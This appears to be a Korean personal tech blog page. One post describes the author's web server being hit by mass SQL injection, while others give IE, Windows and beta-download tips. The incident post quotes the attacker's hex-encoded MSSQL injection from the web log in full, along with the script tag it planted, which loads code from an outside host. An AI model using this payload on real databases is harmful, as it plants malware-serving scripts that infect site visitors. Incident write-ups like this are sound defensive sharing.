|
IE 스크립트 오류를 짚어주는 디버깅 툴로 MS Office 에 옵션으로 설치 가능한 프로그램 입니다. ![]() 그림1. MS Office 설치 또는 기능추가 화면에서 [도구-MSE]를 설치. ![]() 그림2. IE 의 [인터넷옵션-고급-검색]의 스크립트 디버깅 사용안 함 체크 해제.
서버가 당했다.ㅠㅠ
게시판에 오류가 있어서, 인코딩 오류 인 줄 알았더니 각 글마다 아래의 스크립트가 삽입되어져 있었습니다. <script src=http://s.ardoshanghai.com/s.js></script> 어떤 내용인가 소스를 살펴봤더니.. 아이프레임으로 링크를 보이고 해당 링크를 클릭시 공격자가 의도한 파일이 실행되도록 되어 있더군여. 공격받은 웹로그는 아래와 같습니다. ;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20wHiLe(@@fEtCh_status=0)%20bEgIn%20eXeC('uPdAtE%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rTrIm(cOnVeRt(vArChAr(4000),['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F732E6172646F7368616E676861692E636F6D2F732E6A733E3C2F7363726970743E%20aS%20vArChAr(53))')%20fEtCh%20next%20FrOm%20tAbLe_CuRsoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.36.72.57 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 웹로그를 위의 스크립트 문구로 찾아도 없길래 아닌가 했는데, 우연찮게 발견이 되었습니다. 0x3C736372697074207372633D6874747~~~ 요부분이 HEX 인코딩으로 되어 있어서 찾지를 못했었네요...ㅡㅡ;; 오래된 코드들 다 검색해서 받는 값들에 제한을 해놨습니다... 아, 나쁜x들....ㅡㅡ 작은 피해라서 다행이지만, 잘못된 코딩 습관이 더 큰 피해를 불러올 수 있다는 걸 새삼 깨닫게 되었습니다... [하나포스 재테크] ![]()
예전에 사이트 디자인에 매료되어 살짝 카피도 해봤던 곳...
오랜만에 기억을 더듬어 찾아내었다..^^ 예전 디자인은 아니지만, 그래도 진솔한(?) 디자인이 있는곳... http://www.bluewebd.com/
MS사이트에선 며칠전부터 롱혼 서버 베타3의 다운로드를 제공하고있습니다.
public beta라서 누구나 다운로드 할수있답니다. 지금 다운로드 중이랍니다. 다운로드를 위해선 MS사이트에 몇가지 사항들을 등록해주어야하구요 등록이 끝나면 Beta key가 발급됩니다... bata3니깐...조금은 안정화되었겠군여.. RC버전이 나올때가 가까웠다는 말이 되기도 하구요... http://www.microsoft.com/technet/prodtechnol/beta/lhs/default.mspx ![]() 1. 이야기로 아주 쉽게 배우는 미적분 (더글러스다우닝, 이지북) 2. Headfirst JAVA 3. Prototype.js 윈2003에서 예전에 프린터를 공유 하려고, 다른 피시(2003)의 이름 및 암호를 저장한적이 있다. 그러나 서로 아이피가 변경되었고, 이에 내 피시에서 대상 피시로 접속하려니 접근할 수 없다고 나온다...ㅡㅜ 어찌해야 할까 고민 중 그냥 다른 피시를 빌어 쓰다가 오늘 우연히 제어판을 보다가 눈에 확 띄는 메뉴가 있었으니 "저장된 사용자 이름 및 암호"... 역시나 예전 아이피의 이름과 암호를 가지고 있었다. 이를 삭제하고 해당 피시에 접속하니 다시금 계정을 물어본다... 오~~케이^^ 허접 팁스 여기까지...ㅡㅡ;; 인터넷 익스플로러에서 인터넷 화면을 프린트 하면 오르쪽이 짤리는데 그 문제를 해결하는 엑티브엑스입니다. http://www.visiontech.ltd.uk/software/download/IEPrint.htm 이곳에 가신후 엑티브엑스를 실행 -> 설치 하신후에 익스플로러를 껏가 키시면 도구 모임중에 프린트그림에 W라는 표시가 있는 아이콘이 생깁니다. 그것을 클릭하면 화면이 출력되죠 그리고 Ctrl키를 누르고 아이콘을 누르면 미리 보기로 보인답니다.
|